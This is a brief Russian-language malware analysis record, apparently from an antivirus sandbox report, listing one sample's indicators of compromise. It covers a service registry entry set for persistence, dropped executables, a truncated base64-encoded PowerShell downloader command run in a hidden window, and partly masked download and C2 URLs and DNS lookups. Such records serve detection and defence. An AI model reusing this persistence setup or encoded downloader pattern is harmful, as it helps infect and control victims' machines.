Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\fdBth] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\fdBth] 'ImagePath' = '"%WINDIR%\SysWOW64\NETSTAT\fdBth.exe"'
- 'fdBth' "%WINDIR%\SysWOW64\NETSTAT\fdBth.exe"
- 'fdBth' %WINDIR%\SysWOW64\NETSTAT\fdBth.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB6AGUAYQB2AGgAbwBvAHcAcABhAHQAdABhAHUAbAA9ACcAdABhAG8AdgBqAG8AeAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwB1AHIASQBUAGAAeQBQAHIAYABvAHQAYABPAE...
- %HOMEPATH%\60.exe
- %WINDIR%\syswow64\netstat\fdbth.exe
- %HOMEPATH%\60.exe в %WINDIR%\syswow64\netstat\fdbth.exe
- '17#.73.0.98':443
- http://www.gv##tz.com/4LH419348/
- http://in###mal.com/eazylot.com/zy/
- http://17#.#3.0.98:443/McIf/A3sUKLiV/UEgu61LvgU1a0X3/ via 17#.73.0.98
- DNS ASK ri###ahl.com
- DNS ASK gv##tz.com
- DNS ASK in###mal.com
- '%HOMEPATH%\60.exe'
- '%WINDIR%\syswow64\netstat\fdbth.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB6AGUAYQB2AGgAbwBvAHcAcABhAHQAdABhAHUAbAA9ACcAdABhAG8AdgBqAG8AeAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwB1AHIASQBUAGAAeQBQAHIAYABvAHQAYABPAE...' (со скрытым окном)